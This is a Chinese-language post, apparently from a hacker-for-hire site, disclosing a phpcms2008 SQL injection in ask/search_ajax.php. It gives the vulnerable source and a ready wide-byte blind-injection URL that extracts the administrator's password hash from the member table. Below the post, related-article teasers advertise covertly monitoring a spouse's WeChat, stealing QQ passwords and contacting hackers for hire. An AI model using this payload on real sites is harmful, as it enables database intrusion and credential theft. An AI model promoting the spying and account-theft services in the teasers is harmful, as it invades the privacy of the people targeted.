phpcms2008-0day ask/search_ajax.php

访客4年前关于黑客接单697

受影响程序: phpcms2008 gbk

漏洞文件:ask/search_ajax.php

code:

<?php
require './include/common.inc.php';
require_once MOD_ROOT.'include/ask.class.php';
$ask = new ask();
header('Content-type: text/html; charset=utf-8');
if(strtolower(CHARSET) != 'utf-8') $q = iconv(CHARSET, 'utf-8', $q);
if($q)
{
$where = " title LIKE '%$q%' AND status = 5";
}
else
{
exit('null');
}
$infos = $ask->listinfo($where, 'askid DESC', '', 10);

foreach($infos as $key=>$val)
{
$val['title'] = str_replace($q, '<span class="3865-e914-4411-4b16 c_orange">'.$q.'</span>', $val['title']);
$info[$key]['title'] = CHARSET != 'utf-8' ? iconv(CHARSET, 'utf-8', $val['title']) : $val['title'];
$info[$key]['url'] = $val['url'];
}

echo(json_encode($info));
?>

测试 *** :
ask/search_ajax.php?q=s%E6'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23

标签: 好话题

相关文章

教你怎么监控老婆微信聊天不被发现 6大步骤

现在各种黑客可以说是非常猖獗的,他们手中的功能和方法也越来越复杂。 教你怎么监控老婆微信聊天不被发现 1.但事实上,无论多么聪明的手段,最关键的是它们是根据人们的需要而存在的 2.例如,标题的问...

5分钟找取qq号密码,找的几种方法_QQ密码

5分钟盗取qq号密码,盗qq的几种方法,对许多人来说,电脑应当是最经常使用的对象,不过你真的晓得怎样应用电脑吗?适用的电脑小贴士,以最简略、最毋庸讳言的方法带给你最风趣的斩新电脑体验。大众场所的Wi-...

有信誉的黑客联系方式(网上怎么联系黑客)?

网上怎么联系黑客,黑客在普通人看来很高大神秘,但是你可曾想过他们也是普通的人,只是在计算机方面很有天赋的一群技术人员。遇到解决不了的事情的时候,难免会想着寻找黑客帮忙,但是网上我们如何联系到黑客,还要...

wangle不给出款财务清算系统维护怎么办_的是

有的人不给出款干脆就随便乱打,输掉就算了,这样起码心理会比被黑痛快,但是恰恰相反,你会发现余额越打越多,直到一定程度,几十万,上百万,甚至更多,这个时候客服会通知你,让你继续充值,方能顺利出款。 但...

公安局能查出多久的酒店记录(五年前的宾馆记录能查到吗)_公安局能查出多久的酒店记录

公安局能查出多久的酒店记录(五年前的宾馆记录能查到吗),美国《华尔街日报》2月7日征引知恋人士动静称,中国阳光保险团体已和议以每间客房逾200万美米的创记录高价回收位于纽大概曼哈顿中城的新Baccar...

针对MySQL数据库的勒索病毒预警_新浪广东_新浪网

近期,深信服安全团队追踪到国内出现了针对MySQL数据库的勒索攻击行为,截至目前已监测到的攻击行为主要体现为对数据库进行篡改与窃取。在此,深信服安全团队提醒广大用户注意防范(特别是数据库管理员),保护...